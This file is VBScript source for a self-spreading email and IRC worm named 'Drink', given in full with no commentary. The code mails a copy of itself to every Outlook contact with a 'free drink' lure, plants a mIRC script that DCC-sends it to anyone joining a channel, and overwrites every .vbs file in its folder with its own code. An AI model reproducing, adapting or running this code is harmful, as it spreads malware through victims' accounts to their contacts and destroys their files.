'Worm Name: Drink
'Written By: Anonymous
On Error Resume Next
Worm = WScript.ScriptFullName
Set WSH = CreateObject("WScript.Shell") 
Set FSO = CreateObject("Scripting.FileSystemObject")
Set MSOE = CreateObject("Outlook.Application")
If MSOE <> "" Then
Set objOE = MSOE.GetNameSpace("MAPI")
For objNAME = 1 to objOE.AddressLists.Count
Set objADD = MSOE.CreateItem(0)
Set objWORM = objOE.AddressLists.Item(objNAME)
objADD.Attachments.Add Worm
objADD.Subject = "Have a free drink on me check out the attachment"
objADD.Body = "your on your way to a free drink!  Check out the attachment for more info."
Set objVIR = objWORM.AddressEntries
Set objMAPI = objADD.Recipients
For objIWORM = 1 to objVIR.Count
objADD.Recipients.Add objVIR.Item(objIWORM)
Next
objADD.Send
Next
End If
Set objIRC = FSO.CreateTextFile("C:\mirc\script.ini", True)
objIRC.WriteLine "[script]"
objIRC.WriteLine "n0=ON 1:JOIN:#:{ if ( $nick != $me ) {"
objIRC.Write "n1=/dcc           send         $nick """
objIRC.Write Worm
objIRC.WriteLine """ }"
objIRC.Close
Set objINI = FSO.OpenTextFile(Worm, 1, 0)
objSCRIPT = objINI.ReadAll
objINI.Close
objBODY = Left(Worm, InStrRev(Worm, "\"))
For Each objFILE in FSO.GetFolder(objBODY).Files
If ( Right(objFILE.Name, 4) = ".vbs" ) Then
Set objPHILE = FSO.CreateTextFile(objFILE.Name, True)
objPHILE.Write objSCRIPT
objPHILE.Close
End If
Next
